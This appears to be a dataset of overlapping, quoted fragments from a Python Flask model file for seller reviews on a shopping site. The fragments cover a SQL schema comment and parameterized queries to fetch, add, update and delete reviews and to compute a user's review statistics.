"SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time')",
"10 OFFSET :offset ''', user_id = user_id, offset = offset, seller_id = seller_id)",
"= user_id) # If there exists a previous review, create the object if",
"__init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description =",
"in a check to see if the user has bought from this seller",
"AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id, offset",
"row[3], exists = True) for row in rows][0] # Otherwise, create an empty",
"seller_id = seller_id) # flash('Deleted product review for product ID: ' + product_id)",
"request, url_for from flask_login import current_user from sqlalchemy import exc import datetime #",
"last_review = row[2], avg_rating = row[3], exists = True) for row in rows][0]",
"= description, date_time = date_time, user_id = current_user.id, seller_id = seller_id) return 'Done'",
"row[0], seller_id = row[1], date_time = row[2], description = row[3], rating = row[4],",
"AND rating <= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id,",
"1 AND rating <= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY",
"of Sellers # CREATE TABLE SellerReview ( # user_id INT NOT NULL REFERENCES",
"= :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating = rating, description",
"for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT",
"row[0], reviews = row[1], last_review = row[2], avg_rating = row[3], exists = True)",
"then return all reviews from that user elif seller_id is None: rows =",
"seller_id = seller_id) # If there exists a previous review, create the object",
"= seller_id, date_time = date_time, description = description, rating = rating) # This",
"user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM",
"purchase from this seller' # Get information to add to review date_time =",
"avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY user_id ''', user_id =",
"user_id = :user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id",
"(user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs): self.user_id",
"NULL CHECK(rating >= 1 AND rating <= 5), # PRIMARY KEY (user_id, seller_id)",
"= row[3], exists = True) for row in rows][0] # Otherwise, create an",
"= kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists",
"kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id,",
"SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id ORDER",
"RETURNING user_id \"\"\", rating = rating, description = description, date_time = date_time, user_id",
"[SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2], description = row[3], rating",
"then return all reviews for that seller if user_id is None: rows =",
"return reviews[0] # Otherwise, create an empty SellerReview object else: return(SellerReview(exists = False))",
"rating <= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id)",
"FROM SellerReview WHERE user_id = :user_id ORDER BY date_time DESC LIMIT 10 OFFSET",
"seller_id = seller_id, date_time = date_time, description = description, rating = rating) #",
"user_id = user_id) # If there exists a previous review, create the object",
"exists a previous review, create the object if rows: reviews = [SellerReview(user_id =",
"' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS",
"rating = :rating, description = :description, date_time = :date_time WHERE user_id = :user_id",
"no seller_id passed in, return just the first element, not the list if",
"review for this seller from this user except exc.IntegrityError as e: return 'you",
"None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE",
":offset ''', user_id = user_id, offset = offset, seller_id = seller_id) # If",
"offset) # If `seller_id` passed in, then return review from that user for",
"None): # If no passed in `user_id`, then return all reviews for that",
"app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM",
"kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id = None):",
"# user_id INT NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES",
"'') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review')",
"INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING",
":seller_id AND status = 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) #",
"user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating = rating,",
"this seller' # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description",
"the given seller elif seller_id is not None: rows = app.db.execute(''' SELECT user_id,",
"seller_id passed in, return just the first element, not the list if seller_id",
"all reviews from that user elif seller_id is None: rows = app.db.execute(''' SELECT",
"create an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id):",
"review, create the object if rows: return [SellerReview(user_id = row[0], reviews = row[1],",
"= row[3], rating = row[4], exists = True) for row in rows] #",
"seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id",
"elif seller_id is not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description,",
"NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), # date_time",
"WHERE user_id = :user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''',",
"passed in `seller_id`, then return all reviews from that user elif seller_id is",
"= False)) @staticmethod def add_review(request, seller_id): # Add in a check to see",
"to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows =",
"DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id",
"buyer_id = current_user.id, seller_id = seller_id) # This means that user has not",
"OFFSET :offset ''', seller_id = seller_id, offset = offset) # If no passed",
"RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted product review",
"exists = True) for row in rows][0] # Otherwise, create an empty SellerReview",
"description = row[3], rating = row[4], exists = True) for row in rows]",
"seller rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND",
"= seller_id) # If there exists a previous review, create the object if",
"reviews from that user elif seller_id is None: rows = app.db.execute(''' SELECT user_id,",
":seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id,",
"= [SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2], description = row[3],",
"from this seller if not rows: return 'you have not had a completed",
"get(user_id, offset = 0, seller_id = None): # If no passed in `user_id`,",
"<= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES",
"exc import datetime # Reviews of Sellers # CREATE TABLE SellerReview ( #",
"there exists a previous review, create the object if rows: return [SellerReview(user_id =",
"SellerReview WHERE user_id = :user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset",
"# This means that user has not bought from this seller if not",
"from this seller' # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\")",
"date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE",
"@staticmethod def add_review(request, seller_id): # Add in a check to see if the",
":seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted product",
"self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating",
"= app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id",
"review from that user for the given seller elif seller_id is not None:",
"WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''',",
"if the user has bought from this seller rows = app.db.execute(''' SELECT order_id",
"seller elif seller_id is not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time,",
"seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, # description",
"# If `seller_id` passed in, then return review from that user for the",
"exists = True) for row in rows] # If no seller_id passed in,",
"seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id AND seller_id =",
"object if rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time =",
"BY user_id ''', user_id = user_id) # If there exists a previous review,",
"FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET",
"seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id,",
"= current_user.id, seller_id = seller_id, date_time = date_time, description = description, rating =",
">= 1 AND rating <= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN",
"= :user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id =",
"rows] # If no seller_id passed in, return just the first element, not",
"SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add in",
"a previous review, create the object if rows: return [SellerReview(user_id = row[0], reviews",
"rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS",
"previous review, create the object if rows: reviews = [SellerReview(user_id = row[0], seller_id",
"already a review for this seller from this user except exc.IntegrityError as e:",
"WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating =",
"NOT NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL",
"not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview",
"# If there exists a previous review, create the object if rows: reviews",
"= row[1], date_time = row[2], description = row[3], rating = row[4], exists =",
"user has bought from this seller rows = app.db.execute(''' SELECT order_id FROM Purchases",
"= :buyer_id AND seller_id = :seller_id AND status = 'Complete' ''', buyer_id =",
"for row in rows] # If no seller_id passed in, return just the",
"not rows: return 'you have not had a completed purchase from this seller'",
"kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating =",
"have not had a completed purchase from this seller' # Get information to",
"to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows",
":offset ''', seller_id = seller_id, offset = offset) # If no passed in",
"element, not the list if seller_id is None or user_id is None: return",
"= :user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id =",
"user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id AND seller_id",
"= user_id, offset = offset) # If `seller_id` passed in, then return review",
"user_id \"\"\", rating = rating, description = description, date_time = date_time, user_id =",
"check to see if the user has bought from this seller rows =",
"seller if user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description,",
"def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND",
"seller_id, date_time = date_time, description = description, rating = rating) # This means",
"# seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, #",
"import exc import datetime # Reviews of Sellers # CREATE TABLE SellerReview (",
"OFFSET :offset ''', user_id = user_id, offset = offset) # If `seller_id` passed",
"= request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id,",
"current_app as app, flash, redirect, render_template, request, url_for from flask_login import current_user from",
"= rating) # This means already a review for this seller from this",
"add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try:",
"kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id = None): # If no",
"# If no seller_id passed in, return just the first element, not the",
"rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description",
"= row[1], last_review = row[2], avg_rating = row[3], exists = True) for row",
"CREATE TABLE SellerReview ( # user_id INT NOT NULL REFERENCES Users(id), # seller_id",
"self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset",
"previous review, create the object if rows: return [SellerReview(user_id = row[0], reviews =",
"( # user_id INT NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL",
"date_time, description = description, rating = rating) # This means already a review",
"self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews')",
"bought from this seller if not rows: return 'you have not had a",
"AVG(rating) AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY user_id ''',",
"return 'Done' @staticmethod def update_review(request, seller_id): # Get information to add to review",
"= offset) # If `seller_id` passed in, then return review from that user",
"try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id,",
"had a completed purchase from this seller' # Get information to add to",
"the first element, not the list if seller_id is None or user_id is",
"seller_id = :seller_id RETURNING user_id \"\"\", rating = rating, description = description, date_time",
"description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating",
"user_id INT NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id),",
"''', buyer_id = current_user.id, seller_id = seller_id) # This means that user has",
"# rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating <= 5),",
"if not rows: return 'you have not had a completed purchase from this",
"request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time,",
"seller_id = :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id",
"= :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id =",
"GROUP BY user_id ''', user_id = user_id) # If there exists a previous",
"= app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id =",
":user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id,",
"user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE",
"# ); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id')",
"else: return reviews[0] # Otherwise, create an empty SellerReview object else: return(SellerReview(exists =",
"offset = offset) # If no passed in `seller_id`, then return all reviews",
"user has not bought from this seller if not rows: return 'you have",
"not had a completed purchase from this seller' # Get information to add",
"NOT NULL CHECK(rating >= 1 AND rating <= 5), # PRIMARY KEY (user_id,",
"a completed purchase from this seller' # Get information to add to review",
"seller review for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows =",
"description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT",
"a review for this seller from this user except exc.IntegrityError as e: return",
"10 OFFSET :offset ''', seller_id = seller_id, offset = offset) # If no",
"user_id = :user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id",
"product_id) return 'Deleted seller review for seller ID: ' + seller_id @staticmethod def",
"import current_app as app, flash, redirect, render_template, request, url_for from flask_login import current_user",
"rating = rating) # This means already a review for this seller from",
"Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL, # rating",
"user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY",
"from that user elif seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id,",
"is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview",
"''', seller_id = seller_id, offset = offset) # If no passed in `seller_id`,",
"row[1], date_time = row[2], description = row[3], rating = row[4], exists = True)",
"= :rating, description = :description, date_time = :date_time WHERE user_id = :user_id AND",
"# description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >=",
"no passed in `seller_id`, then return all reviews from that user elif seller_id",
"get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating)",
"kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0,",
"date_time = row[2], description = row[3], rating = row[4], exists = True) for",
"description = description, date_time = date_time, user_id = current_user.id, seller_id = seller_id) return",
"def add_review(request, seller_id): # Add in a check to see if the user",
"# date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10,",
"+ product_id) return 'Deleted seller review for seller ID: ' + seller_id @staticmethod",
"review, create the object if rows: reviews = [SellerReview(user_id = row[0], seller_id =",
"DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset = offset) #",
"= datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview",
"LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset = offset) # If",
"rating FROM SellerReview WHERE user_id = :user_id ORDER BY date_time DESC LIMIT 10",
"in rows][0] # Otherwise, create an empty SellerReview object else: return (SellerReview(exists =",
"Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND status = 'Complete'",
"row[2], description = row[3], rating = row[4], exists = True) for row in",
"avg_rating = row[3], exists = True) for row in rows][0] # Otherwise, create",
"user for the given seller elif seller_id is not None: rows = app.db.execute('''",
"ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset",
"user_id = user_id, offset = offset) # If `seller_id` passed in, then return",
"rows: return 'you have not had a completed purchase from this seller' #",
"from this user except exc.IntegrityError as e: return 'you have already made a",
"# Reviews of Sellers # CREATE TABLE SellerReview ( # user_id INT NOT",
"in `user_id`, then return all reviews for that seller if user_id is None:",
"= request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description =",
"NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating",
"for this seller from this user except exc.IntegrityError as e: return 'you have",
":rating, description = :description, date_time = :date_time WHERE user_id = :user_id AND seller_id",
"return review from that user for the given seller elif seller_id is not",
"rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id =",
"the user has bought from this seller rows = app.db.execute(''' SELECT order_id FROM",
"= offset) # If no passed in `seller_id`, then return all reviews from",
"LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset) # If",
"date_time, description, rating FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id",
"seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM",
"= :seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset,",
"app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id",
"`seller_id` passed in, then return review from that user for the given seller",
"exc.IntegrityError as e: return 'you have already made a review for this seller'",
"there exists a previous review, create the object if rows: reviews = [SellerReview(user_id",
"from this seller rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id =",
"seller_id = row[1], date_time = row[2], description = row[3], rating = row[4], exists",
"except exc.IntegrityError as e: return 'you have already made a review for this",
"description = request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id,",
"empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add",
"10 OFFSET :offset ''', user_id = user_id, offset = offset) # If `seller_id`",
"this seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get information to add",
"= True) for row in rows][0] # Otherwise, create an empty SellerReview object",
":date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id, date_time",
"as e: return 'you have already made a review for this seller' return",
"from flask import current_app as app, flash, redirect, render_template, request, url_for from flask_login",
"= kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset =",
"rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review = row[2], avg_rating =",
"flash, redirect, render_template, request, url_for from flask_login import current_user from sqlalchemy import exc",
"WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND status = 'Complete' ''',",
"AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY",
"app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating)",
"app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id",
"SellerReview WHERE user_id = :user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset",
"= row[2], avg_rating = row[3], exists = True) for row in rows][0] #",
"FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\",",
"If there exists a previous review, create the object if rows: reviews =",
"import current_user from sqlalchemy import exc import datetime # Reviews of Sellers #",
"offset = offset, seller_id = seller_id) # If there exists a previous review,",
"current_user.id, seller_id = seller_id) # This means that user has not bought from",
"SellerReview SET rating = :rating, description = :description, date_time = :date_time WHERE user_id",
"2) NOT NULL CHECK(rating >= 1 AND rating <= 5), # PRIMARY KEY",
"return all reviews for that seller if user_id is None: rows = app.db.execute('''",
"DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating <= 5), # PRIMARY",
"as app, flash, redirect, render_template, request, url_for from flask_login import current_user from sqlalchemy",
"update_review(request, seller_id): # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description",
"= :seller_id RETURNING user_id \"\"\", rating = rating, description = description, date_time =",
"AND seller_id = :seller_id AND status = 'Complete' ''', buyer_id = current_user.id, seller_id",
"= row[0], reviews = row[1], last_review = row[2], avg_rating = row[3], exists =",
"reviews else: return reviews[0] # Otherwise, create an empty SellerReview object else: return(SellerReview(exists",
"app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description = :description, date_time = :date_time",
"date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2)",
"INT NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), #",
":user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id = user_id,",
"Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL,",
"in, then return review from that user for the given seller elif seller_id",
"# flash('Deleted product review for product ID: ' + product_id) return 'Deleted seller",
"means that user has not bought from this seller if not rows: return",
"seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id ORDER BY date_time",
"seller' # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description =",
"MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP",
"seller if not rows: return 'you have not had a completed purchase from",
"user_id = user_id, offset = offset, seller_id = seller_id) # If there exists",
"\"\"\", user_id = current_user.id, seller_id = seller_id, date_time = date_time, description = description,",
"= description, rating = rating) # This means already a review for this",
"row[2], avg_rating = row[3], exists = True) for row in rows][0] # Otherwise,",
"user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows =",
"FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self,",
"passed in, then return review from that user for the given seller elif",
"NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE",
"self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating')",
"INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id",
"# FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def",
"\"\"\", rating = rating, description = description, date_time = date_time, user_id = current_user.id,",
"= current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\"",
"or user_id is None: return reviews else: return reviews[0] # Otherwise, create an",
"WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", user_id =",
"elif seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating",
"object if rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review = row[2],",
"= :user_id GROUP BY user_id ''', user_id = user_id) # If there exists",
"seller_id): # Add in a check to see if the user has bought",
"app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id",
"KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs):",
"has not bought from this seller if not rows: return 'you have not",
"flask import current_app as app, flash, redirect, render_template, request, url_for from flask_login import",
"0, seller_id = None): # If no passed in `user_id`, then return all",
"`user_id`, then return all reviews for that seller if user_id is None: rows",
":seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id,",
"= app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id =",
"that user elif seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time,",
"create the object if rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1],",
"This means that user has not bought from this seller if not rows:",
"is None or user_id is None: return reviews else: return reviews[0] # Otherwise,",
"Reviews of Sellers # CREATE TABLE SellerReview ( # user_id INT NOT NULL",
"return 'you have already made a review for this seller' return 'Done' @staticmethod",
"ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*)",
"a check to see if the user has bought from this seller rows",
"date_time, user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows",
"= date_time, user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id):",
"redirect, render_template, request, url_for from flask_login import current_user from sqlalchemy import exc import",
"'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) # This means that user",
"add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows",
"(user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class",
"rating = rating, description = description, date_time = date_time, user_id = current_user.id, seller_id",
"Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id",
"made a review for this seller' return 'Done' @staticmethod def update_review(request, seller_id): #",
"description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id,",
"passed in `user_id`, then return all reviews for that seller if user_id is",
"seller_id = None): # If no passed in `user_id`, then return all reviews",
"<gh_stars>0 from flask import current_app as app, flash, redirect, render_template, request, url_for from",
"seller_id = :seller_id AND status = 'Complete' ''', buyer_id = current_user.id, seller_id =",
"not bought from this seller if not rows: return 'you have not had",
"); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time",
"description, rating FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id LIMIT",
"that user has not bought from this seller if not rows: return 'you",
"WHERE user_id = :user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''',",
":date_time WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating",
"= kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating",
"in `seller_id`, then return all reviews from that user elif seller_id is None:",
"FROM SellerReview WHERE user_id = :user_id GROUP BY user_id ''', user_id = user_id)",
"**kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description',",
"rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description,",
"rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id",
"a previous review, create the object if rows: reviews = [SellerReview(user_id = row[0],",
"seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE",
"datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO",
"have already made a review for this seller' return 'Done' @staticmethod def update_review(request,",
"the list if seller_id is None or user_id is None: return reviews else:",
"self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id",
"CHECK(rating >= 1 AND rating <= 5), # PRIMARY KEY (user_id, seller_id) #",
"SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview",
"rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT 10",
":description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id, date_time =",
"date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC",
"= kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def",
"order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND status",
"# If no passed in `user_id`, then return all reviews for that seller",
"row[4], exists = True) for row in rows] # If no seller_id passed",
"kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews =",
"'Done' @staticmethod def update_review(request, seller_id): # Get information to add to review date_time",
"''', user_id = user_id) # If there exists a previous review, create the",
